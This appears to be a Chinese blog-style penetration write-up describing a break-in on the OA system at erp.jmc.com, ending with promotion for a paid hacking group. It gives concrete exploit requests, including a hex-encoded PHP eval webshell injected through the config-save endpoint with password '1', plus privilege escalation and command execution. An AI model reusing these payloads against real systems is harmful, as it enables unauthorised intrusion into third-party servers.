梭哈梭哈就是梭哈。
爽文警告
不是星标不推送文章了。
师傅也不想吧~
快把极梦C设置成星标吧。
目标为jmc.com
收集到了一个子域名 erp.jmc.com子域名
发现子域名存在一个源码泄漏漏洞。
其中oa.zip是源码。
其余都是一个登录页面。
这里重点是oa的登录页面。
oa是信乎OA,根据oa.zip泄漏.找到了公司名单。存在几个弱口令。
第一步查看历史漏洞。
发现泄漏出来的漏洞,如果想getshell全部都在后台。
1.后台文件上传getshell
2.后台配置文件getshell
不过都需要是管理员的情况下。
如何获取管理员呢?这里查看历史漏洞没有发现什么有价值的。
这里利用了独家秘方的一个越权漏洞。修改+新建把普通用户改成了管理员。
PS:经过本地测试,这里修改后普通用户会存在一些bug。谨慎使用!
上传webshell就简单了。--网上很多教程。
这里利用了后台配置文件上传进行getshell,
因为是写入了配置文件,对目标页面会有危险。
在写入后抓紧复原。
/index.php?a=changestyle&m=geren&d=system&ajaxbool=true&style=21,id=1,name=0x610A6576616C28245F504F53545B315D293B2F2F
清除COOKIES再登录系统 --> 发包:
/index.php?a=savecong&m=cog&d=system&ajaxbool=true&rnd=705961
根据教材走,这里就已经成功上传了webshell。
shell地址:
http://erp.jmc.com/
密码为1
然后上传一个新的马,恢复配置文件。
无法进行命令执行。
全部乱码。修改编码也没啥用。
这里要不把所有的webshell管理工具都尝试一遍,要不就上传php文件尝试。
这里选择了上传phpinfo,发现并未禁用参数。
又上传了system(whoami),发现也是可以成功执行的。
然后利用冰蝎成功命令执行。
正式运营星球:
1.src真实漏洞挖掘案例分享(永久不定时更新),过程详细一看就会哦。
2.自研/二开等工具/平台的分享。
3.漏洞分析/资料共享等。
关于文章/Tools获取方式:请关注交流群或者知识星球。
关于交流群:因为某些原因,更改一下交流群的获取方式:
1.请点击联系我们->联系官方->客服小助手添加二维码拉群 。
关于知识星球的获取方式:
1.后台回复发送 "知识星球",即可获取知识星球二维码。
2如若上述方式不行,请点击联系我们->联系官方->客服小助手添加二维码进入星球 。
3.为了提高质量,推出"免费名人堂"名额,后台回复发送 "知识星球"了解详情。
本公众号文章以技术分享学习为目的。
由于传播、利用本公众号发布文章而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任。
一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!